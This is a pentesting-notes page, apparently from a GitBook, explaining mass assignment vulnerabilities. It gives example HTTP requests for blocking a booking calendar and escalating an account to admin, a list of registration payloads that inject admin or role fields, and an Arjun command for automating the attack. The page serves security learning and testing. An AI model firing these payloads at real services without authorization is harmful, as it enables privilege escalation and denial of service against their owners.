# mass assignment
Mass Assignment is a security vulnerability that arises when an application automatically assigns user input values to an object's properties without properly controlling which attributes are accessible for modification. This can result in unauthorized or unintended changes to sensitive data, such as modifying attributes that should only be editable by an administrator or specific users.
**How it works:**
* An application typically uses an object to represent entities (e.g., a user, product, or account) with various attributes (e.g., `user.email`, `product.stock`, `account.wallet`).
* When a user submits a request (usually a PUT or PATCH request), the application might directly map the user-supplied data to the object's properties.
* If the application does not validate or restrict which attributes can be modified, the user could potentially modify properties they shouldn't have access to (e.g., `product.title`, `account.wallet`, `account.type`).
#### **Scenario 1: Booking an Appointment for a Consultant**
An application allows users to book appointments for a consultant by selecting available time slots.
**Request Example (Normal Booking):**
```json
POST /book HTTP/1.1
Host: domain.com
Content-Type: application/json
{
"startDate": "29/04/2022 11:00",
"endDate": "29/04/2022 12:00",
"userID": "123",
"consultantID": "123"
}
```
An attacker realizes they can modify the `endDate` to extend the appointment for years, thereby blocking future slots.
**Request Example (Malicious Modification):**
```json
POST /book HTTP/1.1
Host: your-domain.com
Content-Type: application/json
{
"startDate": "29/04/2022 11:00",
"endDate": "29/04/2099 12:00", // Extended to an unreasonable future date
"userID": "123",
"consultantID": "123"
}
```
By exploiting this, the attacker could fully block the consultant’s calendar for years. This is a subtle vulnerability, often overlooked because the system doesn’t properly validate the date range or check for unrealistic future times.
***
#### **Scenario 2: Changing User Account Type**
An attacker may gain unauthorized access to higher privileges by manipulating account-related parameters. In this case, the attacker finds that the `AccountType` property is reflected in the response but is not protected in the API.
**Request Example (Normal Profile Update):**
```json
POST /profile/update HTTP/1.1
Host: domain.com
Content-Type: application/json
{
"endDate": "29/04/2099 12:00",
"userID": "123",
"consultantID": "123"
}
```
**Response**:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: <content-length>
{
"AccountType": "user", // Account type is returned in the response
"endDate": "29/04/2099 12:00",
"userID": "123",
"consultantID": "123"
}
**Exploit: Modifying Account Type**
the attacker sends a request including the `AccountType` field.
**Request Example (Malicious Modification):**
```json
POST /profile/update HTTP/1.1
Host: domain.com
Content-Type: application/json
{
"endDate": "29/04/2099 12:00",
"userID": "123",
"consultantID": "123",
"AccountType": "admin" // Attacker adds this field
}
```
**Response**:
```json
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length:
{
"AccountType": "admin", // Account type has been changed to admin
"endDate": "29/04/2099 12:00",
"userID": "123",
"consultantID": "123"
}
```
As a result, the attacker successfully changes their account type to `admin` without any validation, potentially gaining higher privileges such as administrative access.
***
### Mass Assignment Testing Steps
#### Target Vulnerabilities:
* **Account Registration**
* **Unauthorized Access to Organizations**
* **Reset Password**
* **Login**
* **Change Email**
* **Change Username**
#### Account Registration Request:
* **Basic Request**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"password": "Password1!"
}
```
#### Mass Assignment Variations:
1. **Try with `admin` key**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"admin": true,
"password": "Password1!"
}
```
2. **Try with `ADMIN` key**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"ADMIN": true,
"password": "Password1!"
}
```
3. **Try with `isadmin` key**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"isadmin": true,
"password": "Password1!"
}
```
4. **Try with `ISADMIN` key**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"ISADMIN": true,
"password": "Password1!"
}
```
5. **Try with `Admin` key**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"Admin": true,
"password": "Password1!"
}
```
6. **Try with `role` set to `admin`**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"role": "admin",
"password": "Password1!"
}
```
7. **Try with `role` set to `ADMIN`**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"role": "ADMIN",
"password": "Password1!"
}
```
8. **Try with `role` set to `administrator`**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"role": "administrator",
"password": "Password1!"
}
```
9. **Try with `user_priv` set to `administrator`**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"user_priv": "administrator",
"password": "Password1!"
}
```
10. **Try with `user_priv` set to `admin`**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"user_priv": "admin",
"password": "Password1!"
}
```
11. **Try with `admin` as integer**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"admin": 1,
"password": "Password1!"
}
```
#### Unauthorized Access to Organizations:
* **Register with Organization**:
```json
POST /api/v1/register
--snip--
{
"username": "hAPI_hacker",
"email": "hapi@hacker.com",
"org": "§CompanyA§",
"password": "Password1!"
}
```
#### Finding Variables in Documentation:
* Read documentation to find variables, Some Tips [here](/security-notes/notes/api-pen/excessive-data-exposure.md).
#### Fuzzing Unknown Variables:
* Perform actions in the web application, intercept requests, and locate additional headers or parameters.
```json
POST /create/user
--snip--
{
"username": "hapi_hacker",
"pass": "ff7ftw",
"uam": 1,
"mfa": true,
"account": 101
}
```
#### Automating Mass Assignment Attacks:
* **Use Arjun and Burp Suite Intruder**:
```bash
arjun --headers "Content-Type: application/json" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ahmed-tarek.gitbook.io/security-notes/owsap-top-10-2025/a01-broken-access-control/mass-assignment.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.